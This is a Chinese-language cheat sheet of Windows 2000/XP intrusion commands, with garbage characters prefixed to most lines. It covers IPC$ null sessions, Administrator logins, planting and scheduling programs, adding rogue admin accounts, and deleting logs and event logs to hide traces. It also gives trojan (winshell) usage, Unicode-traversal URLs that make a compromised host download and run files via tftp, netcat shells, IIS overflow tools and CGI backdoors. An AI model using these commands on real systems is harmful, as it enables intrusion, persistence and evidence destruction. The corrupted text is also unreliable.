网管和黑客都必须知道的命令
c#XXp"7k�2 常用的几条NET命令:
}d[ k�x�o� bbtGXfI+SB (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�18)'c?�^. 3]O��E}�[R (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
&#o~U$G�Bg e{�h<�g>7� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
r�D�D:7�*z He�K/7IAqp (查看远程主机时间) net time \\IP地址
�
Hu^1�[# l\E%�+?K+^ (定时启动某个程序) at \\IP地址 02:18 readme.exe
3oBtP<yG�. $'0u�|�Xy` (查看共享) net view \\IP地址
��%r<r��cY I.W�vLLK�2 (查看netbios工作组列表) nbtstat -A IP地址
X�Q�rF�4�l v�V'�EZ�?� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
ob+b��<HFv aB*Bz]5;E (这两条把自己增加到管理员组): net user 用户名 密码 /add
^Xuvy{TkPH m-�%��E-nr net localgroup Administrators 用户名 /add
+cD<:"L'�g #�=�D�) j� (断开连接) net use \\IP地址\ipc$ /delete
:<�ka3<0%� <�vnHz?71c 扫尾:
2;�[D;Y}�� Kc!}�`P��m del C:\winnt\system32\logfiles\*.*
��}wWK�FX� ?#� ����Mr del C:\winnt\ssytem32\config\*.evt
8�/��DS:uM ucuSe!�IcX del C:\winnt\system32\dtclog\*.*
:lX!�\(�E2 aC^\(�wp�[ del C:\winnt\system32\*.log
h�e�ltgR�t _� ���?TN; del C:\winnt\system32\*.txt
gMv�.V�{vD
b��o<~jb{ del C:\winnt\*.txt
K}2Erm%A@y
%&$Tz��1" del C:\winnt\*.log
!5w�IIS:FT '���W�Mh8) 一、netsvc.exe
�eiuS�vyY� E�0BMv/r8b 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�S_�iMVHe� "C�?#�SO
B netsvc /list \\IP地址
���7wWF��r F@^�~7ZmP` netsvc schedule \\IP地址 /query
9�lT�v�
� ,K>I%_!1� netsvc \\IP地址 schedule /start
?42<J�%p�
zuP B6�W�^ 二、OpenTelnet.exe
*a�X��F5S B6=�ebM`q� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
,c�$,!.�r� 2:*w~|6>}5 OpenTelnet \\IP地址 用户名 密码 1 7878
?J'���Y��& i}b�${�n�o 然后就可以telnet到主机的7878端口,进入DOS方式下:
r�~[Ia!U�? m9)p-1y@5� telnet IP地址 7878
�6f;�fx}�y 3y�A�Nv?$a 三、winshell.exe
iz5C��A�xm �'�#!
g�h? 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
vrl;�"Fm�+ �d[[]P��X� p Path (查看winshell主程序的路径信息)
M��]�)��ZK d;� �[�C6d b reBoot (重新启动机器)
Us�%�T;�gW K7$x<5�+)� d shutDown (关闭机器)
k2E0/ @f{k zF�foqb#*g s Shell (执行后你就会看到可爱的“C:\>”)
��5&xB6�|k =6xrfDbN�8 x eXit (退出本次登录会话,此命令并不终止winshell的运行)
O�[# 27_dH 1h(0IjG8�� CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
��3�E7ULK� D@��C-5rmq 四、3389登陆器,GUI方式登录远程主机的
X�"�MB|N�y fz�;iOjr>
五、elsave.exe
,�l%C�X�.9 c�_\YBe]wJ 事件日志清除工具
�;V@Wt�Zv %l�L.[�8r| elsave -s \\IP地址 -l "application" -C
;s�fb��4x4 Ok{�*fa.PK elsave -s \\IP地址 -l "system" -C
7ByTn�Ye~S �(�
�W���a elsave -s \\IP地址 -l "security" -C
3W�N`y��8l "r�TQG6�`� 执行后成功清除应用程序日志,系统日志,安全日志
F8h�w�#!Aq X�ttqO���f 六、hbulot.exe
Ku��WWUjCE -�7m:91x�� 开启win2kserver和winxp的3389服务
�!G�OM5z�, OtSL*'7�>� hbulot [/r]
�c/Qt Ot�� J~=n�`�p�W 使用/r表示安装完成后自动重起目标使设置生效。
�Pf*^ZB��% s~�X�+*@.� 七、nc.exe(netcat.exe)
Mc#*�wEo)8 _,q)��h�OI 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
2#o>Z4 r�{ �$�m7?3/YG 想要连接到某处: nc [-options] hostname port[s] [ports] ...
jATI&��o�X cbeLu'DWB. 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
S2n3�9�� 3 yPM3a7-�Bm 参数:
za#s/��b$[ "mX\&%i6\p -e prog 程序重定向,一旦连接,就执行 [危险!!]
vQ<90Z�xqB %�509�\;el -g gateway source-routing hop point[s], up to 8
V7#Ff��i�� �6W@UJx}w5 -G num source-routing pointer: 4, 8, 12, ...
L{:9Cx!F�� �Tskq)N�U� -h 帮助信息
Pa(^}n��|� `I�O�s-%s� -i secs 延时的间隔
�
pnME�B,) MzP�zqm<�� -l 监听模式,用于入站连接
r�I^zB mrr r~+\
Y�"rM -n 指定数字的IP地址,不能用hostname
|\_^��B��� r�X*H��)3F -o file 记录16进制的传输
;g6M�%;1-� wg� ^sGKN -p port 本地端口号
b'P� eH\h{ w0|gG+x jS -r 任意指定本地及远程端口
j�lp:lX��� ��~�U�yV�< -s addr 本地源地址
k����t�K_e ~CtL9m3tO� -u UDP模式
i�Y�`�%SmB MWI4Y@1b�S -v 详细输出——用两个-v可得到更详细的内容
|n�bf���'� s�Bu=�e��7 -w secs timeout的时间
V�mCW6
G#M :�q��
��ti -z 将输入输出关掉——用于扫描时
ii�%+�jdi. 八、TFTPD32.EXE
�i�.=w]S
j DK�fE.p)�� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
D�vPlV �q~ h8� 'v d3 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
x&^_c0�fn� �$jm>:�YD� 然后可以直接令文件运行:
xO�1[��>�W !��E�,A7s http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
FW)� x:2BG �m�.px>�v- 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
9m|�kgY# 4 � �]E_h��� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
l_EM8p�L,f %�T�hyOl@O 一、一 Xscan命令行运行参数说明:
?6�(I V��] UJ0<%^f� � 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
Dw=gs{8�D� wUiys/�OVM 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
3=
�DNb+D! Au�{<hQ��= xscan -file <主机列表文件名> <检测项目> [其他选项]
�^M%uV���� +�zrAG�24q 其中<检测项目> 含义如下:
��0`)�iIz� �@S|jC2^+h -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
I�#m-g-�J Y7#-Fr�a0W -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
WX�}xm�tLs i:rF�Q8��I -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
)�'/|)���� @o#!�EfZyE -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
_9tK�[�/h� ebS0qo[oLH -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
IP``�O!�WP �'; =��f� [其他选项] 含义如下:
wj[\B�*$? GiP`dtK�
� -v: 显示详细扫描进度
� X�O-Prs �u$�*56y�� -p: 跳过Ping不通的主机
pWPIJ>�2G: A,V\"�K�U -o: 跳过没有检测到开放端口的主机
B��YO"�u6 TpmwD{�c[\ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
